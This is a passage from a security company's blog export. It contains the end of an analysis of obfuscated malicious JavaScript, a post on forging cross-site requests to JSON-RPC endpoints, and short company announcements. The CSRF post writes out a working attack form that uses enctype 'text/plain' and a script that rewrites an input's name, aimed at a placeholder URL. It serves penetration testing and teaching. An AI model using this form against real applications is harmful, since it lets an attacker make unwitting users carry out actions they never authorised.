All the previous obfuscations serve to make the static decryption of the final malicious payload hard. Variable vlWWlBt3 from the original obfuscated snippet contains hex encoded encrypted JavaScript code. As the decryption algorithm has to be contained in the script previous obfuscations make sure that detection and analysis of the algorithms are complicated. Encryption algorithms is XOR based where the decryption key is generated from the self-referencing string so it implement simple type of tamper-proof protection. Decrypted code is then simply evaluated by eval() and executed inside the browser.</div>
<div>
Final functionality contains the malicious payload that will launch the Java exploit and install malware on the compromised system.<br />
<br /></div>
<h2>
Summary</h2>
<div>
JavaScript language with it's loose syntax offers variety of ways for the attackers to generate polymorphic wrappers for the malicious payload which effectively hinders traditional anti-malware signatures. By understanding techniques employed by the malware authors we can provide the best protection to our customers with <a href="http://www.defensecode.com/subcategory/blacktitan-10">BlackTitan Internet Security</a>.</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
Unknownnoreply@blogger.com150tag:blogger.com,1999:blog-5480238770642622663.post-54727095830651204772012-09-28T09:42:00.000-07:002012-10-07T15:15:38.751-07:00Cross-Site Request Forgery against applications that use JSON RPCCross-site request forgery is common and well known web application vulnerability. Most of the time exploiting these vulnerabilities is relatively straightforward. You just need to set up a proper HTML form or even use a simple URL. Sometimes, however, things can get a little more complicated. One such example is when the targeted application is using JSON-RPC.<br />
<br />
JSON-RPC is a simple mechanism for issuing a remote procedure call using JSON notation and HTTP. When issuing a JSON-RPC request browser will send a POST request to some URL and the body of the request will be a JSON encoded data, like this:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">{"jsonrpc": "2.0", "method": "subtract", "params": [42, 23], "id": 1}
</span><br />
<br />
More on JSON-RPC can be found <a href="http://en.wikipedia.org/wiki/JSON-RPC">here</a><br />
<br />
Now, the problem is how do you create a CSRF attack against an application that is expecting these kinds of POST requests. Using Ajax (XMLHttpRequest) will not help you since the browser will check for permission to do a cross-domain request (using OPTIONS request).<br />
<br />
We at DefenseCode would like to share a little trick that we use in our penetration tests. You can use this trick to construct an HTML form that will force the browser to submit a proper JSON RPC request to the target application.<br />
<br />
Problem with HTML forms is that input elements need to have a name, without a name, browser will not send the data even if you specify value of the element. To get around this you can set only the name of the input element without a value. For example:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><input name="test_name" />
</span><br />
<br />
Browser will send "test_name=" (without the quotes) to the server. Now, if you could set the name of the element to the body of the JSON-RPC request browser will send it. Since the body of the JSON request contains special characters you should put it inside an HTML using single quotes or you can use a little JavaScript, like this:<br />
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">function modifyForm() {</span><br />
<span style="font-family: Courier New, Courier, monospace;"> document.forms[0].elements[0].name = "{\"jsonrpc\": \"2.0\", \"method\": \"subtract\", \"params\": [42, 23], \"id\": 1}"; return true;</span><br />
<span style="font-family: Courier New, Courier, monospace;">}</span><br />
<span style="font-family: Courier New, Courier, monospace;"><form name="csrf_form" method="POST" action="https://example.com/rpchandler" onsubmit="modifyForm();"></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <input name="test" /></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <input type="submit" /></span><br />
<span style="font-family: Courier New, Courier, monospace;"></form></span><br />
<br />
<br />
This form will cause the browser to send the JSON-RPC data in the body of the POST request to our target URL (with an equal sign on the end). Only one little problem remains. By default browser will urlencode the body and this will break the JSON-RPC parser. To get around that we can use the enctype="text/plain" attribute in the form. text/plain will cause the browser to skip urlencoding. It will only turn spaces into + signs, but luckily we don’t need spaces in JSON :) So, our form for attacking a JSON RPC web application will look like this:<br />
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">function modifyForm() {</span><br />
<span style="font-family: Courier New, Courier, monospace;"> document.forms[0].elements[0].name = "{\"jsonrpc\":\"2.0\",\"method\":\"subtract\",\"params\":[42,23],\"id\":1}";</span><br />
<span style="font-family: Courier New, Courier, monospace;"> return true;</span><br />
<span style="font-family: Courier New, Courier, monospace;">}</span><br />
<span style="font-family: Courier New, Courier, monospace;"><form name="csrf_form" method="POST" action="https://example.com/rpchandler" enctype="text/plain" onsubmit="modifyForm();"></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <input name="test" /></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <input type="submit" /></span><br />
<span style="font-family: Courier New, Courier, monospace;"></form></span>Anonymousnoreply@blogger.com224tag:blogger.com,1999:blog-5480238770642622663.post-34145260255508814852012-09-27T12:16:00.001-07:002012-09-27T12:38:30.076-07:00DefenseCode @ FSEC - FOI Security Symposium 2012<br />
<span style="text-align: justify;">FSEC, Security Symposium (</span><a href="http://fsec.foi.hr/" style="text-align: justify;">http://fsec.foi.hr</a>)<span style="text-align: justify;"> held at Varazdin's FOI was the only proper information security event held this year in Croatia where IT security specialists could gather and discuss the latest trends in information security.</span><br />
<div style="text-align: justify;">
<br />
DefenseCode experts attended the symposium to present and share their findings and expertise on topics connected to information security.<br />
<br />
<div style="text-align: left;">
<div style="text-align: justify;">
The first keynote was given by American cryptographer and computer security specialist<span style="color: #222222; font-family: arial, sans-serif; font-size: x-small;"><span style="line-height: 17.766666412353516px;"> </span></span>Bruce Schneier. DefenseCode's CEO Leon Juranic held a presentation concerning security product development. Delivering from his own firsthand experience in security software development, Juranic covered the development process and its different phases in IT security context concentrating on crucial details that may make or break the project.</div>
</div>
<br />
Leon also covered more technical aspects of security software development and presented new DefenseCode products including the ThunderScan source code analyzer and the DefenseCode Web Scanner intended for blackbox security audits.<br />
<br />
<div style="text-align: left;">
You can download the presentation at the following link<span style="color: #222222; font-family: arial, sans-serif; font-size: x-small;"><span style="line-height: 17.75px;">:</span></span></div>
<a href="http://www.defensecode.com/public/DefenseCode_Security_Products_Development_Presentation.pdf">http://www.defensecode.com/public/DefenseCode_Security_Products_Development_Presentation.pdf</a><br />
<br /></div>
Unknownnoreply@blogger.com697tag:blogger.com,1999:blog-5480238770642622663.post-17051353161688102032012-09-23T12:58:00.000-07:002012-09-27T12:21:38.845-07:00A short insight into ADSL securityRecently, one of our security researchers has been working on a project related to ADSL security.<br />
During his research with various ADSL routers, cameras, and other devices, he also created a simple program that will perform brief on-line test of ADSL device security.<br />
<br />
Program (in fact, a script) will try to connect to your ADSL modem and perform two security checks:<br />
<b>1. It will try to determine if remote administration interface is enabled</b><br />
<b>2. It will also try to login with default password</b><br />
<b><br /></b>
If these two checks return positive results it means that your ADSL modem is not properly configured, and it is wide-open to hacking attacks.<br />
<br />
Check how secure is your ADSL router...<br />
Script is available here:<br />
<a href="http://www.defensecode.com/cgi-bin/adsl-security-check.cgi">http://www.defensecode.com/cgi-bin/adsl-security-check.cgi</a><br />
<br />
Regards,<br />
Leon Juranic<br />
CEO<br />
<div>
<br /></div>
DefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com321tag:blogger.com,1999:blog-5480238770642622663.post-88979913887150669022012-09-13T10:44:00.002-07:002012-09-13T10:46:17.556-07:00Welcome!!!<br />
Dear visitor, hello and welcome to our blog :)<br />
<br />
DefenseCode is an IT start-up focusing on information security. Our goal is to develop products to<br />
automatize detection of vulnerabilities in web application code and to provide information security<br />
services to a wide variety of internet businesses.<br />
<br />
We are a relatively young company made up of seasoned IT/information security professionals<br />
interested in anything and everything even remotely related to information security.<br />
<br />
This is why we started this blog. Here we will analyze, comment and share developments from all<br />
branches of information security business. We're going to write about computer security, security<br />
research, web application security, penetration testing and broader general topics.<br />
<br />
To begin with, web application security is widely underappreciated aspect of information security.<br />
Where companies spend millions of dollars securing their information infrastructure from malicious<br />
programs, spending lots of money and man power perfecting their firewalls, hardening their<br />
communications, analyzing routers and demilitarized zones, often enough they spend zero time on<br />
the one thing that remains open to the Internet – their web applications, usually connected to the<br />
databases containing data vital to their businesses.<br />
<br />
This is where we fit in – and we're going to share our experiences and the knowledge we gained from working in the field that helped us shape and implement our products. We are going to talk about safe programming practices, and why they are often neglected or misunderstood.<br />
<br />
While there are many different kinds of vulnerabilities in modern web application code, there are<br />
some that are more prominent than others. By exposing these often found errors in code that leave<br />
your system vulnerable, we hope to demonstrate DefenseCode software abilities and provide you<br />
with explanation why these vulnerabilities occur and how to avoid or mitigate them in the future.<br />
<br />
This blogspace will hopefully provide you with insight and accurate advice information security wise. We are always available for consultation and advice, so feel free to contact us here or through our website.<br />
<br />
Kind Regards,<br />
Leon Juranic<br />
CEODefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com208tag:blogger.com,1999:blog-5480238770642622663.post-2604772404953401292012-07-10T07:53:00.002-07:002012-07-10T09:08:56.703-07:00DefenseCode BlogHello World. :-DDefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com180